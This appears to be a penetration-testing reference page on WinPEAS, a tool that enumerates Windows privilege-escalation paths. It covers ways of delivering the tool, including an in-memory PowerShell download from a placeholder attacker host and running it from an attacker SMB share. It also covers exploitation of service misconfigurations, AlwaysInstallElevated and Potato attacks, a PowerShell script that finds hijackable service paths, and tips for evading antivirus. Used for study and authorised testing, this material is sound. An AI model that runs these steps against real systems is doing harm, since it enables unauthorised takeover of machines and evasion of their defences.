WinPEAS
Overview
WinPEAS (Windows Privilege Escalation Awesome Script) is the Windows counterpart to LinPEAS. It enumerates hundreds of local privilege escalation vectors on Windows systems (unquoted service paths, AlwaysInstallElevated, weak permissions on services, stored credentials, and more) and colour-codes the output so the likely paths stand out. It only enumerates: nothing is exploited automatically, so every red finding still has to be verified and acted on by hand.
Category
#privilege-escalation #post-exploitation #windows
Phase
Privilege Escalation
Part Of
PEASS-ng (Privilege Escalation Awesome Scripts Suite) GitHub: github.com/carlospolop/PEASS-ng
Variants
| File | Notes |
|---|---|
| winPEASx64.exe / winPEASx86.exe | Compiled .NET executable built for one architecture (most features) |
| winPEASany.exe | .NET Any CPU build, runs on both 32- and 64-bit |
| winPEAS.bat | Batch script fallback (no .NET needed; less thorough) |
| winPEASps1.ps1 | PowerShell version (AV often catches this) |
Getting WinPEAS onto a Target
```
# Method 1: certutil download (if outbound HTTPS is allowed; certutil downloads are widely signatured)
certutil -urlcache -split -f https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe C:\Temp\winpeas.exe
# Method 2: load the PowerShell version straight into memory from a PowerShell prompt (nothing written to disk)
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/winPEASps1.ps1')
# Method 3: run directly from an attacker-hosted SMB share (binary is never written to the target's disk)
\\ATTACKER_IP\share\winPEASany.exe
# Method 4: Meterpreter upload, then run from a shell
meterpreter > upload /local/winpeas.exe C:\\Windows\\Temp\\winpeas.exe
meterpreter > shell
C:\Windows\Temp\winpeas.exe
```
Running WinPEAS
```
# Full run (all checks)
winPEASany.exe
# Specific checks only
winPEASany.exe systeminfo
winPEASany.exe userinfo
winPEASany.exe servicesinfo
winPEASany.exe applicationsinfo
winPEASany.exe networkinfo
winPEASany.exe windowscreds
winPEASany.exe filesinfo
# Output to file; add notcolor so the file is not full of ANSI escape codes
winPEASany.exe notcolor > C:\Temp\output.txt
# Suppress the banner
winPEASany.exe quiet
```
Output Color Legend
| Color | Meaning |
|---|---|
| 🔴 Red | Special privilege over an object, or a misconfiguration: the likely privesc paths |
| 🟢 Green | A protection is enabled or something is well configured |
| Cyan | Active users |
| Blue | Disabled users |
| 🟡 Light yellow | Links |
| White | General info |
To see the colours, run in a terminal that supports ANSI (Windows Terminal, ConEmu) or copy the output to the attacker box and view it with `less -R`. When redirecting to a file, pass `notcolor` so the escape sequences are not written into it.
What WinPEAS Checks
System Info
- OS version / build → potential kernel/OS exploits
- Hotfixes installed (missing patches)
- PowerShell version, .NET versions
User & Group Info
- Current user's token privileges (`whoami /priv`): SeImpersonatePrivilege, SeDebugPrivilege, SeBackupPrivilege, etc.
- Local users and groups, and which groups the current user belongs to
- Logged-in users
Service Misconfigurations
- Unquoted service paths — paths with spaces and no quotes
- Weak service permissions — user can modify service binary
- Modifiable service registry keys
- Services running as LocalSystem with writable binaries
Registry Checks
- AlwaysInstallElevated (MSI packages install as SYSTEM when both the HKLM and HKCU values are 1)
- AutoRun keys pointing to writable locations
- Stored credentials in the registry (e.g. Winlogon autologon, PuTTY sessions)
Stored Credentials
- Windows Credential Manager
- DPAPI master keys
- Stored WiFi passwords
- SAM/SYSTEM hive accessibility (backup copies such as C:\Windows\Repair, and shadow copies)
- LAPS (Local Administrator Password Solution) data
Scheduled Tasks
- Tasks running as higher-privilege users with writable scripts/binaries
File System
- Writable directories in PATH
- Interesting files (passwords in config/log files)
- Recently modified files
Network
- Listening ports not visible externally (pivoting targets)
- ARP/hosts table
- DNS configuration
Key Findings to Act On
```
# Unquoted service path
sc qc "Service Name"
# If BINARY_PATH_NAME is C:\Program Files\Some Service\service.exe (no quotes), the service control
# manager tries C:\Program.exe, then C:\Program Files\Some.exe, before the real binary.
# You need write access to one of those directories (C:\ and C:\Program Files are normally not
# writable for files; vendor directories often are) and a way to restart the service:
# stop/start rights on it, or a reboot if its start type is Auto.

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Only if BOTH values are 1: build a malicious .msi with msfvenom and install it with msiexec (runs as SYSTEM)

# SeImpersonatePrivilege -> Potato attacks
# Use PrintSpoofer, RoguePotato, or GodPotato

# Weak service permissions (SERVICE_CHANGE_CONFIG on the service object)
# Record the current binpath with "sc qc" first so it can be restored afterwards
sc config "Service" binpath= "C:\Temp\shell.exe"
net stop "Service" && net start "Service"
# If only the service binary or its directory is writable (not the service object itself),
# replace the binary on disk instead of reconfiguring the service
```
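The three findings above (unquoted service paths, AlwaysInstallElevated, token privileges) are worth re-checking by hand before acting on them, because WinPEAS reports the pattern, not whether the hijack point is actually writable by you. The following PowerShell is an added example written for this page, not code from PEASS-ng; the function names are my own, and it assumes only built-in cmdlets plus `whoami`. `Test-PathWritable` probes by creating and deleting a file rather than parsing ACLs, which avoids false positives from deny ACEs and nested groups at the cost of a little filesystem noise.

```powershell
# Added example (not part of PEASS-ng): hand-verify three WinPEAS findings before acting on them.
# Assumes only built-in cmdlets (Get-CimInstance, Get-ItemProperty) and whoami.exe.

function Test-PathWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Probe by creating a file, not by reading the ACL: ACL parsing misses deny ACEs,
    # nested groups and integrity levels. The probe is removed at once (still visible to EDR).
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePaths {
    # For every service whose image path is unquoted and contains a space, list the binaries
    # the service control manager would try before the real one, and whether you can plant them.
    foreach ($svc in Get-CimInstance Win32_Service) {
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"')) { continue }
        $p = [Environment]::ExpandEnvironmentVariables($p)
        if ($p -match '^\s*(.*?\.exe)') { $exe = $Matches[1] } else { continue }   # drop arguments
        if ($exe -notmatch ' ') { continue }   # space only in the arguments: not exploitable
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            # C:\Program Files\Some Service\service.exe -> C:\Program.exe, C:\Program Files\Some.exe
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                ImagePath = $svc.PathName
                Candidate = $candidate
                Writable  = Test-PathWritable (Split-Path -Parent $candidate)
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # Both the machine policy and the user policy value must be 1; either one alone does nothing.
    $sub  = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty -Path "HKLM:\$sub" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $hkcu = (Get-ItemProperty -Path "HKCU:\$sub" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    return ($hklm -eq 1 -and $hkcu -eq 1)
}

function Get-InterestingPrivileges {
    # Privileges with known escalation paths. A State of "Disabled" only means the privilege is not
    # currently enabled in the token; a process that holds it can enable it (the Potato tools do this
    # themselves). A privilege that is absent from the list cannot be added.
    $wanted = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeDebugPrivilege',
              'SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege',
              'SeLoadDriverPrivilege', 'SeManageVolumePrivilege'
    whoami /priv /fo csv | ConvertFrom-Csv |
        Where-Object { $wanted -contains $_.'Privilege Name' } |
        Select-Object 'Privilege Name', State
}

# Usage: run the three checks and show only what is actionable.
Get-UnquotedServicePaths | Where-Object Writable | Format-Table -AutoSize
"AlwaysInstallElevated (both keys = 1): $(Test-AlwaysInstallElevated)"
Get-InterestingPrivileges | Format-Table -AutoSize
```

A row with `Writable = True` means a payload named exactly like `Candidate` will be started in place of the real service binary the next time the service starts; `StartMode` and `RunsAs` tell you whether a restart is within reach and what you gain. If `Test-AlwaysInstallElevated` returns True, an MSI built with `msfvenom -f msi` and installed with `msiexec /quiet /qn /i payload.msi` runs as SYSTEM.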
Potato Attacks (SeImpersonatePrivilege)
If WinPEAS shows SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) in the token, which is the default for service accounts such as IIS application pools, Network Service and Local Service:
- PrintSpoofer (github.com/itm4n/PrintSpoofer): needs the Print Spooler service to be running on the target
- GodPotato (github.com/BeichenDream/GodPotato): the current go-to on builds where the older Potatoes are patched
- RoguePotato (github.com/antonioCoco/RoguePotato): needs an attacker-side redirector, since the target must reach TCP/135 on the attacker host
LOLBAS Reference
For Windows-native binary abuse (equivalent of GTFOBins): lolbas-project.github.io
OPSEC Notes
winPEASany.exe is flagged by most AV/EDR solutions. The PEASS-ng releases also ship obfuscated builds (the `_ofs` variants); if those are caught too, compile from source with modified strings. Run via cmd.exe spawned from Meterpreter, or fall back to the .bat version. Avoid writing to C:\Temp on monitored systems; use C:\Windows\Tasks or another user-writable path. Keep in mind that a full run reads a large number of registry keys and files, which stands out in EDR telemetry regardless of how the binary is packed.
Related Tools
- LinPEAS: Linux equivalent
- Meterpreter: common delivery vehicle; `load powershell` to stage WinPEAS
- Metasploit: `post/multi/recon/local_exploit_suggester`, automated Metasploit-native privesc suggestion
Tags
#ethical-hacking #privilege-escalation #windows #post-exploitation #enumeration